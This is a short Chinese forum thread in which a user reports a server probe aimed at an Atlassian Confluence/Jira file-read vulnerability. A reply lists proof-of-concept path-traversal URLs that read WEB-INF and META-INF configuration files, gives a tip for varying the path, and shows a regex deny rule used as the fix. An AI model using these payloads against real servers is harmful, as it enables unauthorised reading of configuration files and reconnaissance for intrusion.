服务器遭到Confluence文件读取漏洞扫描试探渗透
网络安全
35 人阅读
|
1 人回复
|
2024-03-25
|
- /s/33e27393e2431313e2838313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
复制代码
今天发现了不明的url访问,一看就是来渗透的
|
|
|
|
|
|
|
大神
发表于 2024-3-25 11:25:31
|
显示全部楼层
Confluence系统都存在漏洞,漏洞poc如下:
- /s/xx/_/;/WEB-INF/web.xml
- /s/xx/_/;/WEB-INF/decorators.xml
- /s/xx/_/;/WEB-INF/classes/seraph-config.xml
- /s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
- /s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
- /s/xx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- /s/xx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
-
- 稍加改造/s/everything/_/;anythingulike/WEB-INF/web.xml
复制代码 漏洞修复
对正则进行了删改。
- Pattern PATHS_DENIED = Pattern.compile("[^a-zA-Z0-9]((?i)(WEB-INF)|(META-INF))[^a-zA-Z0-9]")
复制代码
|
|
|
|
|
|